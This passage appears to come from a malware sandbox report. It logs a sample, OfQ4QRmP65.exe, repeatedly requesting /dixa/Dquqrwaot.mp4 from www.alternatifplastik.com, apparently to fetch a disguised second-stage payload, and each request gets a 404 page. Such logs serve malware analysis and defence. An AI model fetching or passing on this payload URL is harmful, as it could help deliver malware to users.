                          2025-03-07 14:49:00 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          22192.168.2.11497285.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:49:02 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:49:03 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:49:01 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:49:03 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          23192.168.2.11497295.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:49:05 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:49:06 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:49:03 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:49:06 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          24192.168.2.11497305.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:49:08 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:49:08 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:49:06 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:49:08 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          25192.168.2.11497315.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:49:10 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:49:11 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:49:09 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:49:11 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          26192.168.2.11497325.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:49:13 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:49:14 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:49:11 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:49:14 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          27192.168.2.11497335.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:49:16 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:49:17 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:49:14 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:49:17 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          28192.168.2.11497345.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:49:19 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:49:19 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:49:17 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:49:19 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          29192.168.2.11497355.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:49:21 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:49:22 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:49:20 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:49:22 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          30192.168.2.11497365.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:49:24 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:49:25 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:49:22 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:49:25 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          31192.168.2.11497375.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:49:27 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:49:27 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:49:25 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:49:27 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          32192.168.2.11497385.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:49:29 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:49:30 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:49:28 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:49:30 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          33192.168.2.11497395.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:49:32 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:49:33 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:49:31 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
